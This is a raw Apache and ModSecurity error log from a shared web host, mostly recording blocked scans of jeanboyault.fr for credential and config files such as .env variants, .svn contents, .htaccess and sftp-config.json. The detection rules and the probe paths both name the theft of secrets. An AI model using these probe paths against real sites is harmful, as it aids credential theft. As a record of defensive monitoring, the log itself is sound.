[Mon May 11 11:54:50.730146 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:50.932040 2026] [access_compat:error] [pid 1254242:tid 1254264] [client 95.111.239.37:62526] AH01797: client denied by server configuration: /home/krakouka/public_html/wp-content/uploads/wp-statistics/, referer: binance.com
[Mon May 11 11:54:55.633130 2026] [security2:error] [pid 1254179:tid 1254188] [client 185.177.72.9:7914] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.net/.env.save-fix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.net/.env.save-fix"] [unique_id "agGnb2S6k_SCYd1AVZqu1AAAAQc"]
[Mon May 11 11:54:55.633347 2026] [security2:error] [pid 1254179:tid 1254188] [client 185.177.72.9:7914] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.net/.env.save-fix"] [unique_id "agGnb2S6k_SCYd1AVZqu1AAAAQc"]
[Mon May 11 11:54:56.817754 2026] [security2:error] [pid 1254179:tid 1254188] [client 185.177.72.9:7914] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnb2S6k_SCYd1AVZqu1AAAAQc"]
[Mon May 11 11:54:56.845504 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:7916] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.net/.env.save-fix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.net/.env.save-fix"] [unique_id "agGncEYQeUtAPynIs6xY4AAAAAE"]
[Mon May 11 11:54:56.845719 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:7916] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.net/.env.save-fix"] [unique_id "agGncEYQeUtAPynIs6xY4AAAAAE"]
[Mon May 11 11:54:58.076575 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:7916] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGncEYQeUtAPynIs6xY4AAAAAE"]
[Mon May 11 11:54:59.276182 2026] [authz_core:error] [pid 1254212:tid 1254219] [client 216.73.216.110:60105] AH01630: client denied by server configuration: /home/missmand/public_html/learning/old/main/auth/cas/lib/CAS/PGTStorage/error_log
[Mon May 11 11:55:25.104656 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:32412] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/.env.dev-fix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.svn/.env.dev-fix"] [unique_id "agGnjWS6k_SCYd1AVZqu-wAAAQg"]
[Mon May 11 11:55:25.108049 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:32412] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.svn/.env.dev-fix"] [unique_id "agGnjWS6k_SCYd1AVZqu-wAAAQg"]
[Mon May 11 11:55:26.275624 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:32412] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnjWS6k_SCYd1AVZqu-wAAAQg"]
[Mon May 11 11:55:26.302876 2026] [security2:error] [pid 1254328:tid 1254352] [client 185.177.72.9:32418] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/.env.dev-fix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.svn/.env.dev-fix"] [unique_id "agGnjkRdw2n9wv6Ai48I9QAAAJc"]
[Mon May 11 11:55:26.303280 2026] [security2:error] [pid 1254328:tid 1254352] [client 185.177.72.9:32418] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.svn/.env.dev-fix"] [unique_id "agGnjkRdw2n9wv6Ai48I9QAAAJc"]
[Mon May 11 11:55:27.512886 2026] [security2:error] [pid 1254328:tid 1254352] [client 185.177.72.9:32418] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnjkRdw2n9wv6Ai48I9QAAAJc"]
[Mon May 11 11:55:27.538568 2026] [security2:error] [pid 1254212:tid 1254226] [client 185.177.72.9:32428] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/tsconfig.json._"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.svn/tsconfig.json._"] [unique_id "agGnj0YQeUtAPynIs6xZDgAAAAw"]
[Mon May 11 11:55:27.538782 2026] [security2:error] [pid 1254212:tid 1254226] [client 185.177.72.9:32428] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.svn/tsconfig.json._"] [unique_id "agGnj0YQeUtAPynIs6xZDgAAAAw"]
[Mon May 11 11:55:27.773258 2026] [proxy_http:error] [pid 1256241:tid 1256251] (20014)Internal error (specific information not available): [client 5.255.107.74:29754] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 11:55:28.710738 2026] [security2:error] [pid 1254212:tid 1254226] [client 185.177.72.9:32428] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnj0YQeUtAPynIs6xZDgAAAAw"]
[Mon May 11 11:55:28.735044 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:32434] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/tsconfig.json._"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.svn/tsconfig.json._"] [unique_id "agGnkJkIEwRJMyDaV55PMwAAAU4"]
[Mon May 11 11:55:28.735736 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:32434] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.svn/tsconfig.json._"] [unique_id "agGnkJkIEwRJMyDaV55PMwAAAU4"]
[Mon May 11 11:55:29.953364 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:32434] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnkJkIEwRJMyDaV55PMwAAAU4"]
[Mon May 11 11:55:29.980714 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:32448] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/vite.config.js.inactive"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.svn/vite.config.js.inactive"] [unique_id "agGnkWS6k_SCYd1AVZqvAAAAAQI"]
[Mon May 11 11:55:29.980969 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:32448] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.svn/vite.config.js.inactive"] [unique_id "agGnkWS6k_SCYd1AVZqvAAAAAQI"]
[Mon May 11 11:55:31.133037 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:32448] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnkWS6k_SCYd1AVZqvAAAAAQI"]
[Mon May 11 11:55:31.159734 2026] [security2:error] [pid 1254328:tid 1254350] [client 185.177.72.9:32460] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/vite.config.js.inactive"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.svn/vite.config.js.inactive"] [unique_id "agGnk0Rdw2n9wv6Ai48I_QAAAJQ"]
[Mon May 11 11:55:31.159951 2026] [security2:error] [pid 1254328:tid 1254350] [client 185.177.72.9:32460] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.svn/vite.config.js.inactive"] [unique_id "agGnk0Rdw2n9wv6Ai48I_QAAAJQ"]
[Mon May 11 11:55:32.375011 2026] [security2:error] [pid 1254328:tid 1254350] [client 185.177.72.9:32460] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnk0Rdw2n9wv6Ai48I_QAAAJQ"]
[Mon May 11 11:55:36.519343 2026] [security2:error] [pid 1256241:tid 1256269] [client 43.157.67.70:33394] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "jeanboyault.fr"] [uri "/"] [unique_id "agGnmJkIEwRJMyDaV55POAAAAVc"]
[Mon May 11 11:55:37.378086 2026] [security2:error] [pid 1254179:tid 1254193] [client 43.157.67.70:40906] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "jeanboyault.fr"] [uri "/"] [unique_id "agGnmWS6k_SCYd1AVZqvBwAAAQw"], referer: http://jeanboyault.fr
[Mon May 11 11:55:39.106745 2026] [security2:error] [pid 1254212:tid 1254230] [client 43.157.67.70:44370] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/"] [unique_id "agGnm0YQeUtAPynIs6xZGgAAABA"], referer: https://jeanboyault.fr/
[Mon May 11 11:56:06.767396 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:14106] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /admin/.htaccess.min"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/admin/.htaccess.min"] [unique_id "agGnthjZymfuKpjWXeh-JwAAANI"]
[Mon May 11 11:56:06.767716 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:14106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/admin/.htaccess.min"] [unique_id "agGnthjZymfuKpjWXeh-JwAAANI"]
[Mon May 11 11:56:07.957894 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:14106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnthjZymfuKpjWXeh-JwAAANI"]
[Mon May 11 11:56:07.982201 2026] [security2:error] [pid 1254133:tid 1254153] [client 185.177.72.9:14114] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /admin/.htaccess.min"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/admin/.htaccess.min"] [unique_id "agGntxjZymfuKpjWXeh-KgAAANE"]
[Mon May 11 11:56:07.983413 2026] [security2:error] [pid 1254133:tid 1254153] [client 185.177.72.9:14114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/admin/.htaccess.min"] [unique_id "agGntxjZymfuKpjWXeh-KgAAANE"]
[Mon May 11 11:56:09.213060 2026] [security2:error] [pid 1254133:tid 1254153] [client 185.177.72.9:14114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGntxjZymfuKpjWXeh-KgAAANE"]
[Mon May 11 11:56:12.650462 2026] [security2:error] [pid 1254133:tid 1254155] [client 194.53.140.123:48523] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGnvBjZymfuKpjWXeh-LgAAANM"], referer: https://www.piregwan-genesis.com/
[Mon May 11 11:56:14.869178 2026] [:error] [pid 1254179:tid 1254202] [client 194.163.172.80:61266] File does not exist: /home/totalcloud/public_html/index.php, referer: binance.com
[Mon May 11 11:56:22.172975 2026] [autoindex:error] [pid 1254212:tid 1254460] [client 194.163.172.80:59432] AH01276: Cannot serve directory /home/totalcloud/public_html/.well-known/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Mon May 11 11:56:29.617111 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:6412] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /admin/sftp-config.json.inactive"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/admin/sftp-config.json.inactive"] [unique_id "agGnzURdw2n9wv6Ai48JTgAAAJg"]
[Mon May 11 11:56:29.617525 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:6412] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/admin/sftp-config.json.inactive"] [unique_id "agGnzURdw2n9wv6Ai48JTgAAAJg"]
